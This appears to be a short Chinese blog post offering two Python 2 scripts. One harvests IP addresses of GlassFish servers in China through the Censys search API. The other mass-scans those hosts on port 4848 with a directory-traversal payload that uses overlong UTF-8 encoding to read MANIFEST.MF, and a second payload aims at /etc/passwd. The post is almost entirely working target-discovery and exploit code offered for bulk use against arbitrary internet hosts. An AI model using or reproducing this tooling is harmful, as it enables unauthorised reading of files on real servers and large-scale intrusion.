Sh4dow's Blog

这个是调用censys.io的接口。自己去拿key,我改了

import sys

import json

import requests

API_URL = "https://www.censys.io/api/v1"

UID = "1ad05014-xxx-xxxx-xxxx-xxxxxx"

SECRET = "xxxxxxxxxxxxxxxxxxxxxxxxx"

def get(page):

    data = {

        "query":"443.https.tls.certificate.parsed.subject.organizational_unit: GlassFish china", 

        "page":int(page), 

        "fields":["ip"]

    }

    res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET)).text

    print res

    results = json.loads(res)

    for result in results["results"]:

        print "%s" % (result["ip"])

for i in range(1,2):

    get(i)

'''

python search.py > 1.txt

python GlassFish.py -t 10 1.txt

'''

--------------------------------------------

批量验证：

import threading

import optparse

import Queue

import time

import sys

import requests

MAX_LENGTH=0

ARGS_NUM = 1

payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'

payload2 = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'

x=''

class main_class:

    def __init__(self,target,thread_num,queue):

        self.target = target

        self.thread_num = thread_num

        self.queue = queue       

        self.load_queue()

        

    def load_queue(self):            

        global MAX_LENGTH

        list_hosts = open(ARGS_FILE).read().splitlines() 

        for host in list_hosts:

            self.queue.put(host)

        MAX_LENGTH = self.queue.qsize()

    def stdout(self,what):        

        msg = "***%.2f************      %s" %(time.time()-self.start_time,what)

        sys.stdout.write("\r"+"*"*(30 - len(msg))+msg) 

        sys.stdout.flush()

        print ''

    

    def worker(self):

        global MAX_LENGTH

        global x

        

        while self.queue.qsize() > 0:

            self.stdout(1.000-self.queue.qsize()/float(MAX_LENGTH))

            ip = self.queue.get()

            try:

                req = requests.get("https://"+ip+":4848"+payload,verify=False,timeout=3)

                if "Manifest-Version" in req.content:

                    x = x+ip+'\n'

                    print x,        

            except:

                pass

            

            self.queue.task_done() 

    

    def main(self):

        self.start_time = time.time()

                

        for i in range(self.thread_num):

            t = threading.Thread(target = self.worker)

            t.setDaemon(True)

            t.start()

        

        self.queue.join()

        self.stdout(1)

        print x

if __name__ == "__main__":

    requests.packages.urllib3.disable_warnings()

    

    ARGS_FILE = "" 

    queue = Queue.Queue()

    

    parse = optparse.OptionParser("python xxx.py -t 10 filename")

    parse.add_option('-t','--threads',dest='thread_num',

                        default=10,type='int')

    parse.add_option('-v','--verbose',dest='verbose',

                        default=False)

    

    options,args = parse.parse_args()

    

    if len(args) < ARGS_NUM:

        print parse.print_help()     

        sys.exit(-1)

    ARGS_FILE = args[0] 

    

    if True:

        

        main = main_class(target = 1,thread_num = options.thread_num,queue = queue) 

        main.main()   

'''

python search.py > 1.txt

python GlassFish.py -t 10 1.txt

'''